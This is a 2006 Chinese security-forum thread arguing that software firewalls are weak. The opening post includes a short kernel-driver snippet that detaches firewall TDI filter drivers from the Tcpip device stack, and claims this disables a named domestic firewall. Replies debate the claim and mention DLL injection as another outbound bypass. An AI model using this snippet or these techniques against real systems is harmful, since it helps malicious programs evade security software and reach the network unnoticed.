微点交流论坛 - 防火墙 - ｛转贴｝所有的防火墙都很弱

» 游客: 注册 | 登录 | 帮助

微点交流论坛 » 防火墙 » ｛转贴｝所有的防火墙都很弱

随风摇曳
中级用户

积分 352
发帖 298
注册 2006-9-6
来自汕头

#1 ｛转贴｝所有的防火墙都很弱

唉，软件防火墙好像没一个令我满意的，都比较弱，考虑不全。国内的防火墙更是令人心寒~ 无论是DLL注入还是不引入DLL的纯代码注入，还是TDI Cilent，都能把国内的防火墙搞定。NDIS hook 更不要说了..

来点好玩的，其实我们只要写个驱动，从设备栈里把防火墙的TDI过滤驱动给摘除掉，这样就能对付一般的防火墙了。当然，国外强一点的防火墙，比如ZoneAlarm Pro 6.5就得再结合其他方法了，嘿嘿。

摘除过滤驱动的代码片段：

QUOTE:

RtlInitUnicodeString ( &TcpipName, L"\\Driver\\Tcpip" );

ObReferenceObjectByName( &TcpipName,
            OBJ_CASE_INSENSITIVE,
            NULL,
            0,
            *IoDriverObjectType,
            KernelMode,
            NULL,
            &TcpipDrvObj);

CurrentDevice = TcpipDrvObj->DeviceObject;

while(CurrentDevice != NULL )
{
CurrentDevice->AttachedDevice=0;
CurrentDevice = CurrentDevice->NextDevice;
}

这段代码就能足以使国内人人皆知的天网防火墙装了和没装一样... 呵呵

PS:这里的突破指的是软件防火墙的内对外层面。

[ Last edited by 随风摇曳 on 2006-9-22 at 12:28 ]

※ ※ ※ 本文纯属【随风摇曳】个人意见，与【微点交流论坛】立场无关※ ※ ※

专营传感器，场效应，达林顿，可控硅，二三极管，IC芯片,光电器件等

2006-9-21 15:36

天涯
新手上路

积分 40
发帖 40
注册 2006-9-10

Quote:

Originally posted by 随风摇曳 at 2006-9-21 15:36:
唉，软件防火墙好像没一个令我满意的，都比较弱，考虑不全。国内的防火墙更是令人心寒~ 无论是DLL注入还是不引入DLL的纯代码注入，还是TDI Cilent，都能把国内的防火墙搞定。NDIS hook 更不要说了..

来点好玩的 ...

所有的墙都很弱这句话不成立.我用的是瑞星墙你能突破我再说所有的墙都很弱这句话也不迟

※ ※ ※ 本文纯属【天涯】个人意见，与【微点交流论坛】立场无关※ ※ ※

2006-9-21 23:19

sxh_sxh
版主

灌水区版主

积分 818
发帖 810
注册 2005-12-10

Quote:

请注明转贴。
见h绅博GDATA AntiVirenKit（中国）论坛-> ..:::防火墙区:::.. -> [原创]所有的防火墙都很弱ttp://bbs.hypost.cn/read.php?tid=63953&fpage=1&toread=&page=1

※ ※ ※ 本文纯属【sxh_sxh】个人意见，与【微点交流论坛】立场无关※ ※ ※

偶真想*

2006-9-22 11:33

flo
注册用户

积分 168
发帖 168
注册 2006-8-17

#4

我已经N次看见此帖了。先是在xyzreg的blog里，然后又在各大论坛里看到...
其实这个想法还是正确的，只是有可能吓到一点人了...TDI驱动是大多数防火墙都用到的技术。区别是有的防火墙一棵树上吊死，有的还配合了许多其他的技术，在其他层面上也有拦截。
2楼的朋友：这里说的是从内到外突破。就是假定危险程序已经运行，然后bypass防火墙，比如不经授权访问网络等。瑞星的话，好像DLL注入就能过了吧。

[ Last edited by flo on 2006-9-22 at 22:25 ]

※ ※ ※ 本文纯属【flo】个人意见，与【微点交流论坛】立场无关※ ※ ※

2006-9-22 17:55

论坛跳转:

可打印版本 | 推荐 | 订阅 | 收藏

[ 联系我们 - 东方微点 ] 北京东方微点信息技术有限责任公司福建东方微点信息安全有限责任公司闽ICP备05030815号